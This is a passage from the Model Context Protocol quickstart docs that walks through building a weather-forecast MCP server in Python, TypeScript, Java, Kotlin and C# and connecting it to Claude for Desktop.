uv venv
source .venv/bin/activate
# Install dependencies
uv add "mcp[cli]" httpx
# Create our server file
touch weather.py
```
```powershell Windows theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
uv venv
.venv\Scripts\activate
# Install dependencies
uv add mcp[cli] httpx
# Create our server file
new-item weather.py
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `weather.py`:
```python theme={null}
from typing import Any
import httpx
from mcp.server.fastmcp import FastMCP
# Initialize FastMCP server
mcp = FastMCP("weather")
# Constants
NWS_API_BASE = "https://api.weather.gov"
USER_AGENT = "weather-app/1.0"
```
The FastMCP class uses Python type hints and docstrings to automatically generate tool definitions, making it easy to create and maintain MCP tools.
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```python theme={null}
async def make_nws_request(url: str) -> dict[str, Any] | None:
"""Make a request to the NWS API with proper error handling."""
headers = {"User-Agent": USER_AGENT, "Accept": "application/geo+json"}
async with httpx.AsyncClient() as client:
try:
response = await client.get(url, headers=headers, timeout=30.0)
response.raise_for_status()
return response.json()
except Exception:
return None
def format_alert(feature: dict) -> str:
"""Format an alert feature into a readable string."""
props = feature["properties"]
return f"""
Event: {props.get("event", "Unknown")}
Area: {props.get("areaDesc", "Unknown")}
Severity: {props.get("severity", "Unknown")}
Description: {props.get("description", "No description available")}
Instructions: {props.get("instruction", "No specific instructions provided")}
"""
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```python theme={null}
@mcp.tool()
async def get_alerts(state: str) -> str:
"""Get weather alerts for a US state.
Args:
state: Two-letter US state code (e.g. CA, NY)
"""
url = f"{NWS_API_BASE}/alerts/active/area/{state}"
data = await make_nws_request(url)
if not data or "features" not in data:
return "Unable to fetch alerts or no alerts found."
if not data["features"]:
return "No active alerts for this state."
alerts = [format_alert(feature) for feature in data["features"]]
return "\n---\n".join(alerts)
@mcp.tool()
async def get_forecast(latitude: float, longitude: float) -> str:
"""Get weather forecast for a location.
Args:
latitude: Latitude of the location
longitude: Longitude of the location
"""
# First get the forecast grid endpoint
points_url = f"{NWS_API_BASE}/points/{latitude},{longitude}"
points_data = await make_nws_request(points_url)
if not points_data:
return "Unable to fetch forecast data for this location."
# Get the forecast URL from the points response
forecast_url = points_data["properties"]["forecast"]
forecast_data = await make_nws_request(forecast_url)
if not forecast_data:
return "Unable to fetch detailed forecast."
# Format the periods into a readable forecast
periods = forecast_data["properties"]["periods"]
forecasts = []
for period in periods[:5]: # Only show next 5 periods
forecast = f"""
{period["name"]}:
Temperature: {period["temperature"]}°{period["temperatureUnit"]}
Wind: {period["windSpeed"]} {period["windDirection"]}
Forecast: {period["detailedForecast"]}
"""
forecasts.append(forecast)
return "\n---\n".join(forecasts)
```
### Running the server
Finally, let's initialize and run the server:
```python theme={null}
def main():
# Initialize and run the server
mcp.run(transport="stdio")
if __name__ == "__main__":
main()
```
Your server is complete! Run `uv run weather.py` to start the MCP server, which will listen for messages from MCP hosts.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "uv",
"args": [
"--directory",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather",
"run",
"weather.py"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "uv",
"args": [
"--directory",
"C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather",
"run",
"weather.py"
]
}
}
}
```
You may need to put the full path to the `uv` executable in the `command` field. You can get this by running `which uv` on macOS/Linux or `where uv` on Windows.
Make sure you pass in the absolute path to your server. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. To launch it by running `uv --directory /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather run weather.py`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* TypeScript
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `logging` in Python.
2. For JavaScript, be especially careful - `console.log()` writes to stdout by default.
### Quick Examples
```javascript theme={null}
// ❌ Bad (STDIO)
console.log("Server started");
// ✅ Good (STDIO)
console.error("Server started"); // stderr is safe
```
### System requirements
For TypeScript, make sure you have the latest version of Node installed.
### Set up your environment
First, let's install Node.js and npm if you haven't already. You can download them from [nodejs.org](https://nodejs.org/).
Verify your Node.js installation:
```bash theme={null}
node --version
npm --version
```
For this tutorial, you'll need Node.js version 16 or higher.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
mkdir src
touch src/index.ts
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
md src
new-item src\index.ts
```
Update your package.json to add type: "module" and a build script:
```json package.json theme={null}
{
"type": "module",
"bin": {
"weather": "./build/index.js"
},
"scripts": {
"build": "tsc && chmod 755 build/index.js"
},
"files": ["build"]
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "Node16",
"moduleResolution": "Node16",
"outDir": "./build",
"rootDir": "./src",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"forceConsistentCasingInFileNames": true
},
"include": ["src/**/*"],
"exclude": ["node_modules"]
}
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `src/index.ts`:
```typescript theme={null}
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";
const NWS_API_BASE = "https://api.weather.gov";
const USER_AGENT = "weather-app/1.0";
// Create server instance
const server = new McpServer({
name: "weather",
version: "1.0.0",
});
```
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```typescript theme={null}
// Helper function for making NWS API requests
async function makeNWSRequest(url: string): Promise {
const headers = {
"User-Agent": USER_AGENT,
Accept: "application/geo+json",
};
try {
const response = await fetch(url, { headers });
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
return (await response.json()) as T;
} catch (error) {
console.error("Error making NWS request:", error);
return null;
}
}
interface AlertFeature {
properties: {
event?: string;
areaDesc?: string;
severity?: string;
status?: string;
headline?: string;
};
}
// Format alert data
function formatAlert(feature: AlertFeature): string {
const props = feature.properties;
return [
`Event: ${props.event || "Unknown"}`,
`Area: ${props.areaDesc || "Unknown"}`,
`Severity: ${props.severity || "Unknown"}`,
`Status: ${props.status || "Unknown"}`,
`Headline: ${props.headline || "No headline"}`,
"---",
].join("\n");
}
interface ForecastPeriod {
name?: string;
temperature?: number;
temperatureUnit?: string;
windSpeed?: string;
windDirection?: string;
shortForecast?: string;
}
interface AlertsResponse {
features: AlertFeature[];
}
interface PointsResponse {
properties: {
forecast?: string;
};
}
interface ForecastResponse {
properties: {
periods: ForecastPeriod[];
};
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```typescript theme={null}
// Register weather tools
server.registerTool(
"get_alerts",
{
description: "Get weather alerts for a state",
inputSchema: {
state: z
.string()
.length(2)
.describe("Two-letter state code (e.g. CA, NY)"),
},
},
async ({ state }) => {
const stateCode = state.toUpperCase();
const alertsUrl = `${NWS_API_BASE}/alerts?area=${stateCode}`;
const alertsData = await makeNWSRequest(alertsUrl);
if (!alertsData) {
return {
content: [
{
type: "text",
text: "Failed to retrieve alerts data",
},
],
};
}
const features = alertsData.features || [];
if (features.length === 0) {
return {
content: [
{
type: "text",
text: `No active alerts for ${stateCode}`,
},
],
};
}
const formattedAlerts = features.map(formatAlert);
const alertsText = `Active alerts for ${stateCode}:\n\n${formattedAlerts.join("\n")}`;
return {
content: [
{
type: "text",
text: alertsText,
},
],
};
},
);
server.registerTool(
"get_forecast",
{
description: "Get weather forecast for a location",
inputSchema: {
latitude: z
.number()
.min(-90)
.max(90)
.describe("Latitude of the location"),
longitude: z
.number()
.min(-180)
.max(180)
.describe("Longitude of the location"),
},
},
async ({ latitude, longitude }) => {
// Get grid point data
const pointsUrl = `${NWS_API_BASE}/points/${latitude.toFixed(4)},${longitude.toFixed(4)}`;
const pointsData = await makeNWSRequest(pointsUrl);
if (!pointsData) {
return {
content: [
{
type: "text",
text: `Failed to retrieve grid point data for coordinates: ${latitude}, ${longitude}. This location may not be supported by the NWS API (only US locations are supported).`,
},
],
};
}
const forecastUrl = pointsData.properties?.forecast;
if (!forecastUrl) {
return {
content: [
{
type: "text",
text: "Failed to get forecast URL from grid point data",
},
],
};
}
// Get forecast data
const forecastData = await makeNWSRequest(forecastUrl);
if (!forecastData) {
return {
content: [
{
type: "text",
text: "Failed to retrieve forecast data",
},
],
};
}
const periods = forecastData.properties?.periods || [];
if (periods.length === 0) {
return {
content: [
{
type: "text",
text: "No forecast periods available",
},
],
};
}
// Format forecast periods
const formattedForecast = periods.map((period: ForecastPeriod) =>
[
`${period.name || "Unknown"}:`,
`Temperature: ${period.temperature || "Unknown"}°${period.temperatureUnit || "F"}`,
`Wind: ${period.windSpeed || "Unknown"} ${period.windDirection || ""}`,
`${period.shortForecast || "No forecast available"}`,
"---",
].join("\n"),
);
const forecastText = `Forecast for ${latitude}, ${longitude}:\n\n${formattedForecast.join("\n")}`;
return {
content: [
{
type: "text",
text: forecastText,
},
],
};
},
);
```
### Running the server
Finally, implement the main function to run the server:
```typescript theme={null}
async function main() {
const transport = new StdioServerTransport();
await server.connect(transport);
console.error("Weather MCP Server running on stdio");
}
main().catch((error) => {
console.error("Fatal error in main():", error);
process.exit(1);
});
```
Make sure to run `npm run build` to build your server! This is a very important step in getting your server to connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "node",
"args": ["/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js"]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "node",
"args": ["C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\index.js"]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `node /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js`
Save the file, and restart **Claude for Desktop**.
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP Servers, manually, consult the [Java SDK Server](/sdk/java/mcp-server) documentation.
Let's get started with building our weather server!
[You can find the complete code for what we'll be building here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-stdio-server)
For more information, see the [MCP Server Boot Starter](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html) reference documentation.
For manual MCP Server implementation, refer to the [MCP Server Java SDK documentation](/sdk/java/mcp-server).
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. Ensure any configured logging library will not write to STDOUT
### System requirements
* Java 17 or higher installed.
* [Spring Boot 3.3.x](https://docs.spring.io/spring-boot/installing.html) or higher
### Set up your environment
Use the [Spring Initializer](https://start.spring.io/) to bootstrap the project.
You will need to add the following dependencies:
```xml Maven theme={null}
org.springframework.aispring-ai-starter-mcp-serverorg.springframeworkspring-web
```
```groovy Gradle theme={null}
dependencies {
implementation platform("org.springframework.ai:spring-ai-starter-mcp-server")
implementation platform("org.springframework:spring-web")
}
```
Then configure your application by setting the application properties:
```bash application.properties theme={null}
spring.main.bannerMode=off
logging.pattern.console=
```
```yaml application.yml theme={null}
logging:
pattern:
console:
spring:
main:
banner-mode: off
```
The [Server Configuration Properties](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html#_configuration_properties) documents all available properties.
Now let's dive into building your server.
## Building your server
### Weather Service
Let's implement a [WeatherService.java](https://github.com/spring-projects/spring-ai-examples/blob/main/model-context-protocol/weather/starter-stdio-server/src/main/java/org/springframework/ai/mcp/sample/server/WeatherService.java) that uses a REST client to query the data from the National Weather Service API:
```java theme={null}
@Service
public class WeatherService {
private final RestClient restClient;
public WeatherService() {
this.restClient = RestClient.builder()
.baseUrl("https://api.weather.gov")
.defaultHeader("Accept", "application/geo+json")
.defaultHeader("User-Agent", "WeatherApiClient/1.0 (your@email.com)")
.build();
}
@Tool(description = "Get weather forecast for a specific latitude/longitude")
public String getWeatherForecastByLocation(
double latitude, // Latitude coordinate
double longitude // Longitude coordinate
) {
// Returns detailed forecast including:
// - Temperature and unit
// - Wind speed and direction
// - Detailed forecast description
}
@Tool(description = "Get weather alerts for a US state")
public String getAlerts(
@ToolParam(description = "Two-letter US state code (e.g. CA, NY)") String state
) {
// Returns active alerts including:
// - Event type
// - Affected area
// - Severity
// - Description
// - Safety instructions
}
// ......
}
```
The `@Service` annotation will auto-register the service in your application context.
The Spring AI `@Tool` annotation makes it easy to create and maintain MCP tools.
The auto-configuration will automatically register these tools with the MCP server.
### Create your Boot Application
```java theme={null}
@SpringBootApplication
public class McpServerApplication {
public static void main(String[] args) {
SpringApplication.run(McpServerApplication.class, args);
}
@Bean
public ToolCallbackProvider weatherTools(WeatherService weatherService) {
return MethodToolCallbackProvider.builder().toolObjects(weatherService).build();
}
}
```
Uses the `MethodToolCallbackProvider` utils to convert the `@Tools` into actionable callbacks used by the MCP server.
### Running the server
Finally, let's build the server:
```bash theme={null}
./mvnw clean install
```
This will generate an `mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar` file within the `target` folder.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux.
First, make sure you have Claude for Desktop installed.
[You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.stdio=true",
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.transport=STDIO",
"-jar",
"C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
Make sure you pass in the absolute path to your server.
This tells Claude for Desktop:
1. There's an MCP server named "my-weather-server"
2. To launch it by running `java -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar`
Save the file, and restart **Claude for Desktop**.
## Testing your server with Java client
### Create an MCP Client manually
Use the `McpClient` to connect to the server:
```java theme={null}
var stdioParams = ServerParameters.builder("java")
.args("-jar", "/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar")
.build();
var stdioTransport = new StdioClientTransport(stdioParams);
var mcpClient = McpClient.sync(stdioTransport).build();
mcpClient.initialize();
ListToolsResult toolsList = mcpClient.listTools();
CallToolResult weather = mcpClient.callTool(
new CallToolRequest("getWeatherForecastByLocation",
Map.of("latitude", "47.6062", "longitude", "-122.3321")));
CallToolResult alert = mcpClient.callTool(
new CallToolRequest("getAlerts", Map.of("state", "NY")));
mcpClient.closeGracefully();
```
### Use MCP Client Boot Starter
Create a new boot starter application using the `spring-ai-starter-mcp-client` dependency:
```xml theme={null}
org.springframework.aispring-ai-starter-mcp-client
```
and set the `spring.ai.mcp.client.stdio.servers-configuration` property to point to your `claude_desktop_config.json`.
You can reuse the existing Anthropic Desktop configuration:
```properties theme={null}
spring.ai.mcp.client.stdio.servers-configuration=file:PATH/TO/claude_desktop_config.json
```
When you start your client application, the auto-configuration will automatically create MCP clients from the claude\_desktop\_config.json.
For more information, see the [MCP Client Boot Starters](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-client-docs.html) reference documentation.
## More Java MCP Server examples
The [starter-webflux-server](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-webflux-server) demonstrates how to create an MCP server using SSE transport.
It showcases how to define and register MCP Tools, Resources, and Prompts, using the Spring Boot's auto-configuration capabilities.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/weather-stdio-server)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Kotlin
* LLMs like Claude
### System requirements
* Java 17 or higher installed.
### Set up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val ktorVersion = "3.1.1"
dependencies {
implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
implementation("org.slf4j:slf4j-nop:$slf4jVersion")
implementation("io.ktor:ktor-client-content-negotiation:$ktorVersion")
implementation("io.ktor:ktor-serialization-kotlinx-json:$ktorVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.3.0'
def slf4jVersion = '2.0.9'
def ktorVersion = '3.1.1'
dependencies {
implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
implementation "org.slf4j:slf4j-nop:$slf4jVersion"
implementation "io.ktor:ktor-client-content-negotiation:$ktorVersion"
implementation "io.ktor:ktor-serialization-kotlinx-json:$ktorVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
kotlin("plugin.serialization") version "your_version_of_kotlin"
id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
id 'org.jetbrains.kotlin.plugin.serialization' version 'your_version_of_kotlin'
id 'com.gradleup.shadow' version '8.3.9'
}
```
Now let’s dive into building your server.
## Building your server
### Setting up the instance
Add a server initialization function:
```kotlin theme={null}
// Main function to run the MCP server
fun `run mcp server`() {
// Create the MCP Server instance with a basic implementation
val server = Server(
Implementation(
name = "weather", // Tool name is "weather"
version = "1.0.0" // Version of the implementation
),
ServerOptions(
capabilities = ServerCapabilities(tools = ServerCapabilities.Tools(listChanged = true))
)
)
// Create a transport using standard IO for server communication
val transport = StdioServerTransport(
System.`in`.asInput(),
System.out.asSink().buffered()
)
runBlocking {
server.connect(transport)
val done = Job()
server.onClose {
done.complete()
}
done.join()
}
}
```
### Weather API helper functions
Next, let's add functions and data classes for querying and converting responses from the National Weather Service API:
```kotlin theme={null}
// Extension function to fetch forecast information for given latitude and longitude
suspend fun HttpClient.getForecast(latitude: Double, longitude: Double): List {
val points = this.get("/points/$latitude,$longitude").body()
val forecast = this.get(points.properties.forecast).body()
return forecast.properties.periods.map { period ->
"""
${period.name}:
Temperature: ${period.temperature} ${period.temperatureUnit}
Wind: ${period.windSpeed} ${period.windDirection}
Forecast: ${period.detailedForecast}
""".trimIndent()
}
}
// Extension function to fetch weather alerts for a given state
suspend fun HttpClient.getAlerts(state: String): List {
val alerts = this.get("/alerts/active/area/$state").body()
return alerts.features.map { feature ->
"""
Event: ${feature.properties.event}
Area: ${feature.properties.areaDesc}
Severity: ${feature.properties.severity}
Description: ${feature.properties.description}
Instruction: ${feature.properties.instruction}
""".trimIndent()
}
}
@Serializable
data class Points(
val properties: Properties
) {
@Serializable
data class Properties(val forecast: String)
}
@Serializable
data class Forecast(
val properties: Properties
) {
@Serializable
data class Properties(val periods: List)
@Serializable
data class Period(
val number: Int, val name: String, val startTime: String, val endTime: String,
val isDaytime: Boolean, val temperature: Int, val temperatureUnit: String,
val temperatureTrend: String, val probabilityOfPrecipitation: JsonObject,
val windSpeed: String, val windDirection: String,
val shortForecast: String, val detailedForecast: String,
)
}
@Serializable
data class Alert(
val features: List
) {
@Serializable
data class Feature(
val properties: Properties
)
@Serializable
data class Properties(
val event: String, val areaDesc: String, val severity: String,
val description: String, val instruction: String?,
)
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```kotlin theme={null}
// Create an HTTP client with a default request configuration and JSON content negotiation
val httpClient = HttpClient {
defaultRequest {
url("https://api.weather.gov")
headers {
append("Accept", "application/geo+json")
append("User-Agent", "WeatherApiClient/1.0")
}
contentType(ContentType.Application.Json)
}
// Install content negotiation plugin for JSON serialization/deserialization
install(ContentNegotiation) { json(Json { ignoreUnknownKeys = true }) }
}
// Register a tool to fetch weather alerts by state
server.addTool(
name = "get_alerts",
description = """
Get weather alerts for a US state. Input is Two-letter US state code (e.g. CA, NY)
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("state") {
put("type", "string")
put("description", "Two-letter US state code (e.g. CA, NY)")
}
},
required = listOf("state")
)
) { request ->
val state = request.arguments["state"]?.jsonPrimitive?.content
if (state == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'state' parameter is required."))
)
}
val alerts = httpClient.getAlerts(state)
CallToolResult(content = alerts.map { TextContent(it) })
}
// Register a tool to fetch weather forecast by latitude and longitude
server.addTool(
name = "get_forecast",
description = """
Get weather forecast for a specific latitude/longitude
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("latitude") { put("type", "number") }
putJsonObject("longitude") { put("type", "number") }
},
required = listOf("latitude", "longitude")
)
) { request ->
val latitude = request.arguments["latitude"]?.jsonPrimitive?.doubleOrNull
val longitude = request.arguments["longitude"]?.jsonPrimitive?.doubleOrNull
if (latitude == null || longitude == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'latitude' and 'longitude' parameters are required."))
)
}
val forecast = httpClient.getForecast(latitude, longitude)
CallToolResult(content = forecast.map { TextContent(it) })
}
```
### Running the server
Finally, implement the main function to run the server:
```kotlin theme={null}
fun main() = `run mcp server`()
```
Make sure to run `./gradlew build` to build your server. This is a very important step in getting your server to connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\libs\\weather-0.1.0-all.jar"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `java -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartWeatherServer)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* C#
* LLMs like Claude
* .NET 8 or higher
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files
### System requirements
* [.NET 8 SDK](https://dotnet.microsoft.com/download/dotnet/8.0) or higher installed.
### Set up your environment
First, let's install `dotnet` if you haven't already. You can download `dotnet` from [official Microsoft .NET website](https://dotnet.microsoft.com/download/). Verify your `dotnet` installation:
```bash theme={null}
dotnet --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
```powershell Windows theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
After running `dotnet new console`, you will be presented with a new C# project.
You can open the project in your favorite IDE, such as [Visual Studio](https://visualstudio.microsoft.com/) or [Rider](https://www.jetbrains.com/rider/).
Alternatively, you can create a C# application using the [Visual Studio project wizard](https://learn.microsoft.com/en-us/visualstudio/get-started/csharp/tutorial-console?view=vs-2022).
After creating the project, add NuGet package for the Model Context Protocol SDK and hosting:
```bash theme={null}
# Add the Model Context Protocol SDK NuGet package
dotnet add package ModelContextProtocol --prerelease
# Add the .NET Hosting NuGet package
dotnet add package Microsoft.Extensions.Hosting
```
Now let’s dive into building your server.
## Building your server
Open the `Program.cs` file in your project and replace its contents with the following code:
```csharp theme={null}
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol;
using System.Net.Http.Headers;
var builder = Host.CreateEmptyApplicationBuilder(settings: null);
builder.Services.AddMcpServer()
.WithStdioServerTransport()
.WithToolsFromAssembly();
builder.Services.AddSingleton(_ =>
{
var client = new HttpClient() { BaseAddress = new Uri("https://api.weather.gov") };
